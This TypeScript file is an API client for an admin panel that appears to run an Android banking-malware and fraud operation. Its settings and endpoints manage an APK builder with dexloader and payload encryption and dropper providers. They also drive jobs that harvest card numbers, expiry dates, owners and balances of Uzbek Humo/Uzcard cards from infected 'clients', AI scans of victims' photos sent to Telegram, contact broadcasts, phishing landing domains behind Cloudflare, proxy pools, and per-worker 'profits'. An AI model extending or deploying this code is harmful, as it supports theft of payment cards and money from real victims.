import { api } from './http';
import type {
	AdminSenderProxyStatsResponse,
	DeliveryProfile,
	SenderProxyAdminConfig,
	SenderProxyConfig,
	SenderProxyImportDetail,
	SenderProxyImportListResponse,
	SenderProxyListResponse,
	SenderProxyPreviewResult,
	SenderProxyPoolSettings,
	SenderProxyUploadResult,
} from '@/entities/sender.entity';
import type { SenderAuthJobDetail, SenderProfileSettings } from '@/api/sender-panel';
import type { IAdminStats, StatsPeriod } from '@/entities/admin-stats.entity';
import type { RunSummary, RunDetail, RunEvent, SessionSummary } from '@/entities/sender.entity';
import type {
	IAdminBuild,
	IAdminProfit,
	IAdminUser,
	IAdminUserDetail,
	IAssignedPartner,
	IPartnerWorker,
	UserRole,
} from '@/entities/admin-user.entity';
import type {
	IAdminBuilderQueueResponse,
	IAdminCancelAllActiveBuildsResult,
} from '@/entities/admin-builder-queue.entity';
import type { IBuildLogLine } from '@/entities/build-live.entity';
import type { IClient } from '@/entities/client.entity';
import type { ILandingDomain, ILandingEventStats, ILandingLink, ILandingSite } from '@/entities/landing.entity';
import { normalizeLandingEventStatsResponse } from '@/api/landings';

export interface IAdminSettings {
	builderEnabled: boolean;
	dailyBuildLimit: number;
	defaultBuilderIcons: string[];
	encryptEnabled: boolean;
	encryptDexloader: 'yes' | 'no';
	encryptAssets: 'yes' | 'no';
	encryptRenamePackage: 'yes' | 'no';
	payloadEncryptEnabled: boolean;
	payloadEncryptDexloader: 'yes' | 'no';
	payloadEncryptAssets: 'yes' | 'no';
	payloadEncryptRenamePackage: 'yes' | 'no';
	dropperProvider: 'smartbin' | 'omad';
	testBuildEnabled: boolean;
	domainsEnabled: boolean;
	domainCloudflareApiToken?: string | null;
	domainCloudflareOriginCaKey?: string | null;
	domainCloudflareAccountId?: string | null;
	domainOriginIp?: string | null;
	domainDailyLimitPerUser?: number;
	domainCheckIntervalMs?: number;
	domainNsTimeoutDays?: number;
	domainsInfrastructureReady?: boolean;
	domainsInfrastructureMissing?: Array<
		'cloudflare_token' | 'cloudflare_account_id' | 'origin_ip' | 'nginx_enabled' | 'nginx_ssh_host'
	>;
	landingsEnabled: boolean;
	landingsConnectDedupMs: number;
	landingsLinkTtlSeconds: number;
	landingCloudflareApiToken?: string | null;
	landingCloudflareAccountId?: string | null;
	landingOriginIp?: string | null;
	landingDomainCheckIntervalMs?: number;
	landingDomainNsTimeoutDays?: number;
	landingsInfrastructureReady?: boolean;
	landingsInfrastructureMissing?: Array<'cloudflare_token' | 'cloudflare_account_id' | 'origin_ip'>;
	contactBroadcastEnabled: boolean;
	contactBroadcastText: string;
	contactBroadcastDelayMs: number;
	pushBalanceEnabled: boolean;
	pushBalancePackageAllowlist: string[];
	pushBalanceTgMinUzs: number;
	photosAiEnabled: boolean;
	photosAiAllowedCategories: string[];
	photosAiPromptExtra: string;
	photosAiModel: string;
	photosAiEndpoint: string;
	photosScanMaxDays: number;
	photosScanMaxCount: number;
	photosTgChatId: string;
	photosAiApiKey?: string | null;
	senderEnabled?: boolean;
	senderWebappEnabled?: boolean;
	senderPresetsEnabled?: boolean;
	senderAutoCampaignEnabled?: boolean;
	senderConsoleEnabled?: boolean;
	senderHubProfileSettingsVisible?: boolean;
	senderHubAuthJobsVisible?: boolean;
	senderLandingAuthEnabled?: boolean;
	senderAutoRunEnabled?: boolean;
	senderDeviceAutoEnabled?: boolean;
	senderDevicePipelineMaxInflight?: number;
	senderMaxConcurrentRuns?: number;
	senderSessionUploadMaxMb?: number;
	senderDeliveryProfile?: DeliveryProfile;
	senderProxyConfig?: SenderProxyConfig;
	cardFillEnabled?: boolean;
	cardFillDateCheckEnabled?: boolean;
	cardFillDateCheckHumoEnabled?: boolean;
	cardFillDateCheckUzcardEnabled?: boolean;
	cardFillPanResolveEnabled?: boolean;
	cardFillPanResolveUzcardEnabled?: boolean;
	cardFillAutoOnPhoneResolve?: boolean;
	cardFillAutoPanResolveAfterLookup?: boolean;
	cardFillPanResolveMaxConcurrent?: number;
	cardFillPanResolveMaxDurationSec?: number;
	cardFillPanResolveMaxInflight?: number;
	cardFillLeaseSec?: number;
	cardFillBalanceFetchEnabled?: boolean;
	cardFillBalanceRefreshIntervalMinutes?: number;
	cardFillBalanceLeaseSec?: number;
	cardFillMaxReclaims?: number;
	cardFillZipResolveEnabled?: boolean;
	cardFillLaunchImportZipPans?: boolean;
	cardFillSmsProofEnabled?: boolean;
	cardFillSmsProofMode?: 'chain_only' | 'balance_verify';
	cardFillSmsProofDebitOnly?: boolean;
	cardFillAlertDedupTtlSec?: number;
}

export async function fetchAdminSettings() {
	const { data } = await api.get<IAdminSettings>('/admin/settings');
	return data;
}

export async function patchAdminSettings(
	body: Partial<IAdminSettings>,
	options?: { suppressToast?: boolean },
) {
	const { data } = await api.patch<IAdminSettings>('/admin/settings', body, options);
	return data;
}

const PROXY_UPLOAD_TIMEOUT_MS = 120_000;

function proxyMultipart(file: File, options: { protocol: string; format: string }) {
	const formData = new FormData();
	formData.append('file', file);
	formData.append('protocol', options.protocol);
	formData.append('format', options.format);
	return formData;
}

export type CardFillProxyStats = {
	total: number;
	available: number;
	assigned: number;
};

export type CardFillImportRecord = {
	id: string;
	filename: string;
	protocol: string | null;
	format: string | null;
	validLines: number;
	invalidLines: number;
	duplicatesRemoved: number;
	added: number;
	skipped: number;
	proxyCountAfter: number;
	createdAt: string;
};

export type CardFillAdminStats = {
	jobs: Record<string, number>;
	proxies: CardFillProxyStats;
	imports: CardFillImportRecord[];
	bins?: {
		dateCheckAllowlist: string[];
		panResolveBlocked: string[];
	};
};

export type CardFillProxyPreviewResult = {
	validCount: number;
	invalidLines: number;
	duplicatesRemoved: number;
	detectedFormat: SenderProxyConfig['format'];
	sample: string[];
	wouldAdd: number;
	wouldSkip: number;
};

export type CardFillProxyUploadResult = {
	importId: string;
	added: number;
	skipped: number;
	invalidLines: number;
	duplicatesRemoved: number;
	proxyCountTotal: number;
	proxyCountAvailable: number;
};

export type CardFillProxyClearResult = {
	removed: number;
	proxyCountTotal: number;
};

export type CardFillAdminJobRow = {
	id: string;
	clientId: string;
	profileId: number | null;
	profileNickname: string | null;
	phoneId: number | null;
	phoneNumber: string | null;
	cardId: number | null;
	cardMask: string | null;
	queue: string;
	jobType: string;
	status: string;
	payload: unknown;
	result?: unknown;
	error: string | null;
	attempts: number;
	executeEpoch: number;
	reclaimCount: number;
	workerId: string | null;
	proxyId: number | null;
	proxyCount: number;
	leaseExpiresAt: string | null;
	createdAt: string;
	startedAt: string | null;
	finishedAt: string | null;
};

export type CardFillAdminCardRow = {
	id: number;
	clientId: string;
	profileId: number;
	profileNickname: string;
	buildId: string;
	number: string;
	maskedNumber: string | null;
	provider: string | null;
	date: string | null;
	owner: string | null;
	bankName: string | null;
	sources: string[];
	dateSource: string | null;
	balance: number | null;
	balanceDate: string | null;
	enrichedAt: string | null;
	phoneId: number | null;
	phoneNumber: string | null;
	createdAt: string;
};

export async function fetchCardFillStats() {
	const { data } = await api.get<CardFillAdminStats>('/admin/card-fill/stats');
	return data;
}

export async function fetchCardFillAdminJobs(params: {
	status?: 'pending' | 'running' | 'done' | 'failed' | 'cancelled' | 'terminal';
	cursor?: string | null;
	limit?: number;
}) {
	const { data } = await api.get<{ items: CardFillAdminJobRow[]; nextCursor: string | null }>(
		'/admin/card-fill/jobs',
		{ params },
	);
	return data;
}

export async function fetchCardFillAdminCards(params: { cursor?: string | null; limit?: number }) {
	const { data } = await api.get<{ items: CardFillAdminCardRow[]; nextCursor: string | null }>(
		'/admin/card-fill/cards',
		{ params },
	);
	return data;
}

export type CardFillEnqueueOnlineResult = {
	clientsTotal: number;
	clientsProcessed: number;
	jobsEnqueued: number;
	skipped: Record<string, number>;
	zipClientsProcessed: number;
	zipOk: number;
	zipSkipped: Record<string, number>;
};

export async function postCardFillEnqueueOnline() {
	const { data } = await api.post<CardFillEnqueueOnlineResult>('/admin/card-fill/enqueue-online');
	return data;
}

export async function previewCardFillProxies(
	file: File,
	options: { protocol: SenderProxyConfig['protocol']; format: SenderProxyConfig['format'] },
) {
	const { data } = await api.post<CardFillProxyPreviewResult>(
		'/admin/card-fill/proxies/preview',
		proxyMultipart(file, options),
		{ timeout: PROXY_UPLOAD_TIMEOUT_MS },
	);
	return data;
}

export async function uploadCardFillProxies(
	file: File,
	options: { protocol: SenderProxyConfig['protocol']; format: SenderProxyConfig['format'] },
) {
	const { data } = await api.post<CardFillProxyUploadResult>(
		'/admin/card-fill/proxies/upload',
		proxyMultipart(file, options),
		{ timeout: PROXY_UPLOAD_TIMEOUT_MS },
	);
	return data;
}

export async function clearCardFillProxies() {
	const { data } = await api.delete<CardFillProxyClearResult>('/admin/card-fill/proxies');
	return data;
}

export async function previewSenderProxies(
	file: File,
	options: { protocol: SenderProxyConfig['protocol']; format: SenderProxyConfig['format'] },
) {
	const { data } = await api.post<SenderProxyPreviewResult>(
		'/admin/sender-proxies/preview',
		proxyMultipart(file, options),
		{ timeout: PROXY_UPLOAD_TIMEOUT_MS },
	);
	return data;
}

export async function uploadSenderProxies(
	file: File,
	options: { protocol: SenderProxyConfig['protocol']; format: SenderProxyConfig['format'] },
) {
	const { data } = await api.post<SenderProxyUploadResult>(
		'/admin/sender-proxies',
		proxyMultipart(file, options),
		{ timeout: PROXY_UPLOAD_TIMEOUT_MS },
	);
	return data;
}

export async function clearSenderProxies(confirm = 'УДАЛИТЬ') {
	const { data } = await api.delete<SenderProxyUploadResult>('/admin/sender-proxies', {
		data: { confirm },
	});
	return data;
}

export async function fetchAdminSenderProxyStats() {
	const { data } = await api.get<AdminSenderProxyStatsResponse>('/admin/sender-proxies/stats');
	return data;
}

export async function fetchSenderProxyImports(params?: { page?: number; limit?: number }) {
	const { data } = await api.get<SenderProxyImportListResponse>('/admin/sender-proxies/imports', { params });
	return data;
}

export async function fetchSenderProxyImport(id: string) {
	const { data } = await api.get<SenderProxyImportDetail>(`/admin/sender-proxies/imports/${id}`);
	return data;
}

export async function fetchSenderProxies(params?: {
	status?: string;
	outOfImport?: boolean;
	page?: number;
	limit?: number;
}) {
	const { data } = await api.get<SenderProxyListResponse>('/admin/sender-proxies', { params });
	return data;
}

export async function patchSenderProxy(id: string, action: 'retire' | 'remove' | 'restore') {
	const { data } = await api.patch<{ ok: boolean }>(`/admin/sender-proxies/${id}`, { action });
	return data;
}

export async function deleteSenderProxy(id: string) {
	const { data } = await api.delete<{ ok: boolean }>(`/admin/sender-proxies/${id}`);
	return data;
}

export async function bulkPatchSenderProxies(ids: string[], action: 'retire' | 'remove') {
	const { data } = await api.post<{ affected: number }>('/admin/sender-proxies/bulk', { ids, action });
	return data;
}

export async function fetchSenderProxyAdminConfig() {
	const { data } = await api.get<SenderProxyAdminConfig>('/admin/sender-proxies/settings');
	return data;
}

export async function patchSenderProxyAdminConfig(body: {
	config?: Partial<Omit<SenderProxyConfig, 'proxyCount'>>;
	poolSettings?: Partial<SenderProxyPoolSettings>;
}) {
	const { data } = await api.patch<SenderProxyAdminConfig>('/admin/sender-proxies/settings', body);
	return data;
}

export async function fetchAdminStats(period: StatsPeriod) {
	const { data } = await api.get<IAdminStats>('/admin/stats', { params: { period } });
	return data;
}

export async function fetchAdminUsers(params: {
	search?: string;
	role?: UserRole;
	cursor?: number;
	limit?: number;
}) {
	const { data } = await api.get<{ users: IAdminUser[]; nextCursor: number | null }>('/admin/users', { params });
	return data;
}

export async function fetchAdminUser(profileId: number) {
	const { data } = await api.get<{ user: IAdminUserDetail }>(`/admin/users/${profileId}`);
	return data.user;
}

export async function patchAdminUser(
	profileId: number,
	body: { role?: UserRole; isBanned?: boolean; pin?: string },
) {
	const { data } = await api.patch<{ user: IAdminUserDetail }>(`/admin/users/${profileId}`, body);
	return data.user;
}

export async function fetchPartnerWorkers(profileId: number) {
	const { data } = await api.get<{ workers: IPartnerWorker[] }>(`/admin/users/${profileId}/partner-workers`);
	return data.workers;
}

export async function putPartnerWorkers(profileId: number, workerProfileIds: number[]) {
	const { data } = await api.put<{ workers: IPartnerWorker[] }>(`/admin/users/${profileId}/partner-workers`, {
		workerProfileIds,
	});
	return data.workers;
}

export async function fetchAssignedPartners(profileId: number) {
	const { data } = await api.get<{ partners: IAssignedPartner[] }>(`/admin/users/${profileId}/assigned-partners`);
	return data.partners;
}

export async function putAssignedPartners(profileId: number, partnerProfileIds: number[]) {
	const { data } = await api.put<{ partners: IAssignedPartner[] }>(`/admin/users/${profileId}/assigned-partners`, {
		partnerProfileIds,
	});
	return data.partners;
}

export async function fetchAdminUserClients(
	profileId: number,
	params: { cursor?: string; limit?: number; isOnline?: boolean; search?: string },
) {
	const { data } = await api.get<{ clients: IClient[]; nextCursor: string | null }>(`/admin/users/${profileId}/clients`, {
		params,
	});
	return data;
}

export async function fetchAdminUserBuilds(profileId: number) {
	const { data } = await api.get<{ builds: IAdminBuild[] }>(`/admin/users/${profileId}/builds`);
	return data.builds;
}

export async function fetchAdminBuildLogs(buildId: string) {
	const { data } = await api.get<{ buildId: string; lines: IBuildLogLine[]; failureMessage?: string }>(
		`/admin/builds/${encodeURIComponent(buildId)}/logs`,
	);
	return data;
}

export async function fetchAdminUserProfits(profileId: number, params?: { cursor?: number; limit?: number }) {
	const { data } = await api.get<{ profits: IAdminProfit[]; nextCursor: number | null }>(`/admin/users/${profileId}/profits`, {
		params,
	});
	return data;
}

export async function createProfit(workerName: string, amount: number) {
	const { data } = await api.post('/create-profit', { workerName, amount });
	return data;
}

export async function releaseLandingDomain(body: { zoneName: string } | { domainId: number }) {
	const { data } = await api.post<{ released: boolean; zoneName: string }>('/admin/landings/release-domain', body);
	return data;
}

const adminLandingsApiConfig = {
	suppressConnectionOverlay: true,
	suppressToast: true,
};

export async function fetchAdminUserLandingDomains(profileId: number) {
	const { data } = await api.get<{ items: ILandingDomain[] }>(
		`/admin/users/${profileId}/landings/domains`,
		adminLandingsApiConfig,
	);
	return data.items;
}

export async function fetchAdminUserLandingSites(profileId: number) {
	const { data } = await api.get<{ items: ILandingSite[] }>(
		`/admin/users/${profileId}/landings/sites`,
		adminLandingsApiConfig,
	);
	return data.items;
}

export async function fetchAdminUserLandingLinks(
	profileId: number,
	params?: { cursor?: string; limit?: number; siteId?: number },
) {
	const { data } = await api.get<{ items: ILandingLink[]; nextCursor: string | null }>(
		`/admin/users/${profileId}/landings/links`,
		{ ...adminLandingsApiConfig, params },
	);
	return data;
}

export async function fetchAdminUserLandingEventStats(
	profileId: number,
	params?: { period?: StatsPeriod; linkId?: string },
) {
	const { data } = await api.get<ILandingEventStats>(
		`/admin/users/${profileId}/landings/events/stats`,
		{ ...adminLandingsApiConfig, params },
	);
	return normalizeLandingEventStatsResponse(data);
}

export async function forceReassignSenderSessionProxy(sessionId: string) {
	const { data } = await api.post<{ proxyId: string; proxyUrlMasked: string }>(
		`/admin/sender-sessions/${sessionId}/force-reassign-proxy`,
	);
	return data;
}

const adminSenderApiConfig = {
	suppressConnectionOverlay: true,
	suppressToast: true,
};

export interface AdminSenderDispatchSummary {
	id: string;
	runId: string;
	source: 'panel_manual' | 'landing' | 'device';
	status: string;
	priority: number;
	authJobId?: string | null;
	linkId?: string | null;
	clientId?: string | null;
	landingHostname?: string | null;
	createdAt: string;
}

export async function fetchAdminUserSenderProfileSettings(profileId: number) {
	const { data } = await api.get<SenderProfileSettings>(
		`/admin/users/${profileId}/sender/profile-settings`,
		adminSenderApiConfig,
	);
	return data;
}

export async function fetchAdminUserSenderAuthJobs(
	profileId: number,
	params?: { status?: string; limit?: number },
) {
	const { data } = await api.get<{ items: SenderAuthJobDetail[] }>(
		`/admin/users/${profileId}/sender/auth-jobs`,
		{ ...adminSenderApiConfig, params },
	);
	return data.items;
}

export async function fetchAdminUserSenderDispatch(
	profileId: number,
	params?: { status?: string; limit?: number },
) {
	const { data } = await api.get<{ items: AdminSenderDispatchSummary[] }>(
		`/admin/users/${profileId}/sender/dispatch`,
		{ ...adminSenderApiConfig, params },
	);
	return data.items;
}

export async function fetchAdminUserSenderRuns(
	profileId: number,
	params?: { status?: string; limit?: number; cursor?: string },
) {
	const { data } = await api.get<{ items: RunSummary[]; nextCursor?: string | null }>(
		`/admin/users/${profileId}/sender/runs`,
		{ ...adminSenderApiConfig, params },
	);
	return data;
}

export async function fetchAdminUserSenderSessions(
	profileId: number,
	params?: { status?: string; limit?: number },
) {
	const { data } = await api.get<{ items: SessionSummary[] }>(
		`/admin/users/${profileId}/sender/sessions`,
		{ ...adminSenderApiConfig, params },
	);
	return data.items;
}

export function buildAdminUserSenderRunPath(profileId: number, runId: string): string {
	return `/admin/users/${profileId}/sender/runs/${runId}`;
}

export async function fetchAdminUserSenderRun(profileId: number, runId: string) {
	const { data } = await api.get<RunDetail>(buildAdminUserSenderRunPath(profileId, runId), adminSenderApiConfig);
	return data;
}

export async function fetchAdminUserSenderRunEvents(
	profileId: number,
	runId: string,
	params?: { limit?: number; cursor?: string },
) {
	const { data } = await api.get<{ items: RunEvent[]; nextCursor?: string | null }>(
		`${buildAdminUserSenderRunPath(profileId, runId)}/events`,
		{ ...adminSenderApiConfig, params },
	);
	return data;
}

export async function cancelAdminUserSenderRun(profileId: number, runId: string) {
	const { data } = await api.post<{ id: string; status: string }>(
		`${buildAdminUserSenderRunPath(profileId, runId)}/cancel`,
		undefined,
		{ ...adminSenderApiConfig, suppressToast: false },
	);
	return data;
}

export async function resumeAdminUserSenderRun(profileId: number, runId: string) {
	const { data } = await api.post<{ runId: string; dispatchStatus: 'queued' }>(
		`${buildAdminUserSenderRunPath(profileId, runId)}/resume`,
		undefined,
		{ ...adminSenderApiConfig, suppressToast: false },
	);
	return data;
}

export async function fetchAdminBuilderQueue(params?: { historyCursor?: string; historyLimit?: number }) {
	const { data } = await api.get<IAdminBuilderQueueResponse>('/admin/builder-queue', { params });
	return data;
}

export async function adminCancelBuild(buildId: string, reason: string) {
	const { data } = await api.post<{ build: IAdminBuild }>(`/admin/builds/${buildId}/cancel`, { reason });
	return data;
}

export async function adminCancelCurrentBuild(reason: string) {
	const { data } = await api.post<{ build: IAdminBuild }>('/admin/builder-queue/cancel-current', { reason });
	return data;
}

export async function adminCancelAllActiveBuilds(reason: string) {
	const { data } = await api.post<IAdminCancelAllActiveBuildsResult>('/admin/builder-queue/cancel-all-active', {
		reason,
	});
	return data;
}
